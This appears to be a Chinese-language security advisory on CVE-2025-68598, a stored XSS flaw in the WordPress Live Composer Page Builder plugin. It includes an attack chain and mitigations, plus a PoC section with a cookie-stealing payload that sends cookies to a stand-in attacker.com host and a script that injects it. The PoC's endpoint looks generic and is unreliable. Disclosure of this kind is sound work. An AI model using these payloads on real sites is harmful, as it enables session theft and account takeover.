CVE-2025-68598 WordPress Live Composer插件存储型XSS漏洞

漏洞信息

漏洞编号

CVE-2025-68598

漏洞类型

存储型跨站脚本攻击(Stored XSS)

CVSS评分

6.5 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

需要交互 (UI:R)

影响产品

WordPress Live Composer Page Builder插件 (live-composer-page-builder)

漏洞概述

CVE-2025-68598是WordPress插件Live Composer Page Builder中的一个存储型跨站脚本(XSS)漏洞。该漏洞由于插件在Web页面生成过程中未能正确对用户输入进行中立化处理，导致攻击者可以在页面中注入恶意脚本代码。受影响的插件版本从某个未知版本到2.1.13均存在此问题。由于是存储型XSS，恶意脚本会被永久保存在服务器端，当其他用户访问包含恶意代码的页面时，攻击便会自动执行。攻击者利用此漏洞可以窃取用户会话Cookie、劫持用户账户、进行钓鱼攻击或传播恶意软件。CVSS 3.1评分6.5（中危），攻击向量为网络，攻击复杂度低，但需要低权限用户配合以及用户交互才能成功利用。

技术细节

该漏洞属于典型的存储型XSS（Stored Cross-Site Scripting）漏洞。在Web应用开发中，当用户提交的数据被存储到数据库或文件系统后，在后续页面展示时如果没有进行适当的输入过滤和输出编码，恶意脚本代码便会被浏览器解析执行。Live Composer Page Builder插件在处理用户输入时，未能对特殊字符进行正确的中立化处理（如HTML实体编码），导致攻击者可以在页面内容中注入JavaScript代码。由于插件直接在前端页面输出用户提交的数据，恶意脚本会随页面一起被永久存储。当网站管理员或普通访客访问包含恶意代码的页面时，浏览器会执行这些脚本，从而触发XSS攻击。攻击者通常利用此漏洞窃取用户的认证令牌（Cookie），进而冒充合法用户进行操作。修复此类漏洞需要在输出时对所有用户可控数据进行HTML实体编码，并实施严格的内容安全策略(CSP)。

攻击链分析

STEP 1

1.侦察阶段

攻击者识别目标网站使用的WordPress版本，并确认是否安装了Live Composer Page Builder插件

STEP 2

2.账户获取

攻击者获取目标网站的低权限用户账户（如订阅者、贡献者角色），或者通过其他方式获取凭证

STEP 3

3.漏洞注入

攻击者通过插件的输入接口（如页面编辑器、模块设置等）提交包含恶意JavaScript代码的Payload

STEP 4

4.数据存储

恶意代码被永久存储在服务器的数据库或文件系统中，无需再次提交

STEP 5

5.触发执行

当管理员或普通访客访问包含恶意代码的页面时，浏览器解析并执行注入的JavaScript脚本

STEP 6

6.恶意操作

攻击者通过执行的脚本窃取用户Cookie、会话令牌，或者进行其他恶意操作如账户劫持

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

// CVE-2025-68598 PoC - Stored XSS in Live Composer Page Builder
// Attack Vector: Inject malicious JavaScript via plugin input fields

// Payload example for XSS exploitation:
const xssPayload = '<script>alert(document.cookie)</script>';

// Alternative payload for cookie stealing:
const cookieTheftPayload = '<img src=x onerror="fetch(`https://attacker.com/log?c=`+document.cookie)">';

// Automated exploitation example:
async function exploitStoredXSS(targetUrl) {
    const loginUrl = targetUrl + '/wp-login.php';
    const pluginAdminUrl = targetUrl + '/wp-admin/admin.php?page=live_composer';
    
    // Step 1: Authenticate with low-privilege account
    await fetch(loginUrl, {
        method: 'POST',
        body: new URLSearchParams({
            'log': 'attacker_username',
            'pwd': 'attacker_password',
            'wp-submit': 'Log In'
        })
    });
    
    // Step 2: Inject XSS payload through plugin interface
    await fetch(pluginAdminUrl, {
        method: 'POST',
        body: new URLSearchParams({
            'action': 'save',
            'content': cookieTheftPayload,
            'post_id': '123'
        })
    });
    
    console.log('XSS payload injected successfully');
    console.log('Payload will execute when victim visits affected page');
}

影响范围

Live Composer Page Builder (live-composer-page-builder) <= 2.1.13

防御指南

临时缓解措施

在官方补丁发布之前，可采取以下临时缓解措施：1)限制Live Composer插件的用户权限，仅允许受信任的管理员使用；2)启用WordPress的安全 headers（如X-Content-Type-Options、X-Frame-Options）；3)部署Web应用防火墙规则过滤XSS特征；4)对所有用户输入实施强制性的HTML净化处理；5)监控日志中的异常请求模式；6)考虑暂时禁用该插件直到修复版本发布。